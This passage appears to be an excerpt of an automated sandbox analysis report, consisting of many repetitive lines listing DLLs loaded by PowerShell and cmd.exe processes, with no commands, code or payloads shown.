                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
